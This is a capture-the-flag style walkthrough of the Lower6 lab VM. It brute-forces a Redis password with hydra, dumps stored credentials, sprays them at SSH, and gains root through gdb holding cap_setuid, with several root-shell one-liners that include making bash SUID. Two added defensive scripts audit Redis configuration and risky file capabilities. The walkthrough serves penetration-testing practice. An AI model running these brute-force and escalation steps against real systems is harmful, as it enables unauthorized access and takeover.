# Lab setup
Download: Lower6
Download and import the VM, set the network adapter to NAT mode, and get started.
IP: 10.10.10.7
# Penetration process
# Initial reconnaissance
Scan the services first:
```text
┌──(root㉿kali)-[~]
└─# nmap -p- -sV -T4 10.10.10.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-22 03:05 EDT
Nmap scan report for 10.10.10.7
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
6379/tcp open  redis   Redis key-value store
MAC Address: 08:00:27:55:D6:D8 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.87 seconds
```
Only Redis and SSH: a blind guess is that some credentials have leaked through Redis.
Check whether Redis allows unauthenticated access:
```text
┌──(root㉿kali)-[~]
└─# redis-cli -h 10.10.10.7
10.10.10.7:6379> keys *
(error) NOAUTH Authentication required.
10.10.10.7:6379>
```
It does not, so brute-force the password with hydra.
# Exploitation
# Brute-forcing the Redis password
```text
┌──(root㉿kali)-[~]
└─# hydra -t 64 redis://10.10.10.7 -P /usr/share/wordlists/rockyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-22 03:09:57
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking redis://10.10.10.7:6379/
[6379][redis] host: 10.10.10.7   password: hellow
[STATUS] attack finished for 10.10.10.7 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-22 03:10:08
```
Got the password: hellow
# Reading the Redis contents
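A short password on a network-reachable Redis is the whole foothold here, so a defender's first check is the service configuration. The following is an added example, not part of the original writeup: it audits a redis.conf for a missing or short `requirepass`, a bind on every interface, and protected mode switched off; both configs it inspects are constructed, and the hardened one uses a placeholder where a long random secret belongs.

```shell
# Added example (not part of the original writeup): audit a redis.conf for the
# exposure this box relied on, a network-reachable Redis with a short password
# (rockyou cracked "hellow" in eleven seconds) holding cleartext credentials.
# The two configs below are constructed; point audit_redis_conf at
# /etc/redis/redis.conf on a real host.

# redis_directive <name> <file>: effective value of a directive. Redis takes
# the last uncommented occurrence; surrounding quotes are stripped.
redis_directive() {
    awk -v k="$1" '$1 == k { v = $2 } END { gsub("\"", "", v); print v }' "$2"
}

# audit_redis_conf <file>: print space-separated findings, nothing if clean.
audit_redis_conf() {
    pass=$(redis_directive requirepass "$1")
    bind=$(redis_directive bind "$1")
    pmode=$(redis_directive protected-mode "$1")
    findings=""
    if [ -z "$pass" ]; then
        findings="${findings}NO_AUTH "          # anyone who can connect reads every key
    elif [ "${#pass}" -lt 16 ]; then
        findings="${findings}WEAK_PASSWORD "    # no lockout in Redis, so short means crackable
    fi
    case "$bind" in
        ""|0.0.0.0|"*") findings="${findings}BIND_ALL " ;;   # reachable from any interface
    esac
    if [ "$pmode" = "no" ]; then findings="${findings}PROTECTED_MODE_OFF "; fi
    echo "${findings% }"
}

# write_sample_conf <file>: constructed config modelled on the target's exposure.
write_sample_conf() {
    printf '%s\n' 'bind 0.0.0.0' 'protected-mode no' 'requirepass "hellow"' > "$1"
}

# write_hardened_conf <file>: the same service with the weaknesses removed;
# the password is a placeholder to be replaced by a long random secret.
write_hardened_conf() {
    printf '%s\n' 'bind 127.0.0.1 -::1' 'protected-mode yes' \
        'requirepass REPLACE_WITH_LONG_RANDOM_SECRET_PLACEHOLDER' > "$1"
}

tmp=$(mktemp)
write_sample_conf "$tmp";   audit_redis_conf "$tmp"   # WEAK_PASSWORD BIND_ALL PROTECTED_MODE_OFF
write_hardened_conf "$tmp"; audit_redis_conf "$tmp"   # (prints an empty line)
rm -f "$tmp"
```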
```text
┌──(root㉿kali)-[~]
└─# redis-cli -h 10.10.10.7
10.10.10.7:6379> auth hellow
OK
10.10.10.7:6379> keys *
1) "key3"
2) "key2"
3) "key5"
4) "key4"
5) "key1"
10.10.10.7:6379> MGET key1 key2 key3 key4 key5
1) "killer:K!ll3R123"
2) "ghost:Ghost!Hunter42"
3) "snake:Pixel_Sn4ke77"
4) "wolf:CyberWolf#21"
5) "shadow:ShadowMaze@9"
10.10.10.7:6379>
```
# Brute-forcing SSH
With usernames and passwords in hand, build a wordlist and brute-force SSH. There are only a few pairs, so it could be done by hand.
Every pair as stored fails, which suggests the usernames and passwords are shuffled relative to each other. Time for Cluster Bomb: try every username against every password.
First collect the usernames and passwords into separate files:
```text
redis-cli -h 10.10.10.7 -a hellow MGET key1 key2 key3 key4 key5 2>/dev/null |awk '{print $1}' |cut -d ':' -f1 >user.txt
redis-cli -h 10.10.10.7 -a hellow MGET key1 key2 key3 key4 key5 2>/dev/null |awk '{print $1}' |cut -d ':' -f2 >pass.txt
```

```text
┌──(root㉿kali)-[~]
└─# hydra -t 64 -L user.txt -P pass.txt ssh://10.10.10.7
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-10-22 03:32:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 25 tasks per 1 server, overall 25 tasks, 25 login tries (l:5/p:5), ~1 try per task
[DATA] attacking ssh://10.10.10.7:22/
[22][ssh] host: 10.10.10.7   login: killer   password: ShadowMaze@9
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-10-22 03:32:17
```
Got a working account: killer:ShadowMaze@9
# Privilege escalation
Upload an enumeration tool to the box:
```text
┌──(root㉿kali)-[~]
└─# wget https://github.com/peass-ng/PEASS-ng/releases/download/20251017-d864f4c3/linpeas.sh
--2025-10-22 03:53:12--  https://github.com/peass-ng/PEASS-ng/releases/download/20251017-d864f4c3/linpeas.sh
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8b396ddb-bfa5-42be-b5d9-1d719eccfdf8?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-22T08%3A51%3A02Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-22T07%3A50%3A31Z&ske=2025-10-22T08%3A51%3A02Z&sks=b&skv=2018-11-09&sig=Vve%2BiHdCGkWiRK8gUN%2F6OQeRlWOcOVerZc7DKj6L98g%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc2MTExOTg5MiwibmJmIjoxNzYxMTE5NTkyLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.EBZkOCkCcULs2dQ3ZNXQpPISUBxqN02Fuz5RwGjPiRY&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2025-10-22 03:53:13--  https://release-assets.githubusercontent.com/github-production-release-asset/165548191/8b396ddb-bfa5-42be-b5d9-1d719eccfdf8?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-22T08%3A51%3A02Z&rscd=attachment%3B+filename%3Dlinpeas.sh&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-22T07%3A50%3A31Z&ske=2025-10-22T08%3A51%3A02Z&sks=b&skv=2018-11-09&sig=Vve%2BiHdCGkWiRK8gUN%2F6OQeRlWOcOVerZc7DKj6L98g%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc2MTExOTg5MiwibmJmIjoxNzYxMTE5NTkyLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.EBZkOCkCcULs2dQ3ZNXQpPISUBxqN02Fuz5RwGjPiRY&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving release-assets.githubusercontent.com (release-assets.githubusercontent.com)... 185.199.110.133, 185.199.108.133, 185.199.111.133, ...
Connecting to release-assets.githubusercontent.com (release-assets.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 971926 (949K) [application/octet-stream]
Saving to: 'linpeas.sh'

linpeas.sh          100%[==================================>] 949.15K  1.20MB/s    in 0.8s

2025-10-22 03:53:15 (1.20 MB/s) - 'linpeas.sh' saved [971926/971926]

┌──(root㉿kali)-[~]
└─# scp scp linpeas.sh killer@10.10.10.7:~
killer@10.10.10.7's password:
linpeas.sh                                    100%  949KB  49.2MB/s   00:00
```
Run it; it reports that gdb is present:
```text
╔══════════╣ Checking sudo tokens
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#reusing-sudo-tokens
ptrace protection is disabled (0), so sudo tokens could be abused
gdb was found in PATH
doas.conf Not Found
```
Privilege escalation could be achieved by stealing sudo tokens with gdb. Checking further shows something more direct:
```text
killer@lower6:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
```
Here we see that ping and gdb carry file capabilities the current user can use, which break down as follows.
In Linux, capabilities replace the traditional all-or-nothing root privilege model:
- cap_net_raw: raw network access (ping, tcpdump, etc.)
- cap_setuid: change the process user ID
- cap_setgid: change the process group ID
- cap_sys_admin: system administration operations
Flag letters:
- e: Effective (currently in effect)
- p: Permitted (allowed to be used)
- i: Inheritable (can be inherited)
So gdb, with cap_setuid effective and permitted, can gain root privileges.
We can therefore exploit it directly.
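The two conditions linpeas and getcap exposed above, a root-equivalent file capability on a debugger and ptrace_scope set to 0, are both easy to audit for. The following is an added example, not part of the original writeup: it filters getcap output for capabilities a local user can turn into root and classifies the Yama ptrace_scope value; the getcap lines it runs over are constructed sample input, and the capability list is this example's own choice.

```shell
# Added example (not part of the original writeup): a hardening check for the
# two findings linpeas and getcap surfaced above, file capabilities that are
# root-equivalent in a local user's hands (cap_setuid on gdb here) and a Yama
# ptrace_scope of 0. The getcap lines below are constructed sample input; on
# a real host pipe the live output in:  /usr/sbin/getcap -r / 2>/dev/null | audit_caps

# Capabilities a local user can turn into full root (identity change, DAC
# bypass, kernel module or ptrace access). Used as an awk regular expression.
DANGEROUS_CAPS='cap_setuid|cap_setgid|cap_sys_admin|cap_sys_ptrace|cap_dac_override|cap_dac_read_search|cap_sys_module|cap_fowner|cap_chown'

# audit_caps: read getcap output on stdin, print only dangerous entries as
# "<path> <caps>". Handles "path cap=ep" (libcap >= 2.41, as on the Debian 12
# target) and the older "path = cap+ep" format.
audit_caps() {
    awk -v re="$DANGEROUS_CAPS" '
    {
        path = ""; caps = ""
        if (NF == 3 && $2 == "=") { path = $1; caps = $3 }   # old libcap format
        else if (NF == 2)         { path = $1; caps = $2 }   # new libcap format
        if (caps != "" && caps ~ re) print path, caps
    }'
}

# ptrace_scope_status <value>: classify kernel.yama.ptrace_scope. 0 lets any
# process attach to any other process of the same uid, which is what linpeas
# reported as "ptrace protection is disabled"; 1 or higher is expected.
ptrace_scope_status() {
    case "$1" in
        0)     echo "weak" ;;
        1|2|3) echo "ok" ;;
        *)     echo "unknown" ;;
    esac
}

# Constructed getcap output modelled on the target, plus one old-format line.
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/gdb cap_setuid=ep
/opt/legacy/tool = cap_sys_admin+ep'

# audit_sample: run the check over the constructed sample.
audit_sample() { printf '%s\n' "$SAMPLE_GETCAP" | audit_caps; }

# Remediation for a hit is to drop the capability (as root): setcap -r <path>
audit_sample                                               # flags gdb and the legacy tool
ptrace_scope_status "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
```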
# Privilege escalation with gdb
```text
# Method 1: escalate directly with gdb
/usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex 'python import os; os.system("/bin/bash")' -ex quit
# Method 2: attach to another process
/usr/bin/gdb -p 1
# Inside gdb, run:
# (gdb) call setuid(0)
# (gdb) shell /bin/bash
# Method 3: create a SUID shell
/usr/bin/gdb -nx -ex 'python import os; os.system("chmod +s /bin/bash")' -ex quit
/bin/bash -p # bash now runs as root
# Method 4: get a root shell interactively
/usr/bin/gdb -q
(gdb) python import os; os.setuid(0)
(gdb) python import os; os.system("/bin/bash")
# You should now be root
```
```text
killer@lower6:~$ /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex 'python import os; os.system("/bin/bash")' -ex quit
GNU gdb (Debian 13.1-3) 13.1
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
root@lower6:~# cat /root/root.txt
03f4adf5855fe3a1e0df4b0c885ec67a
```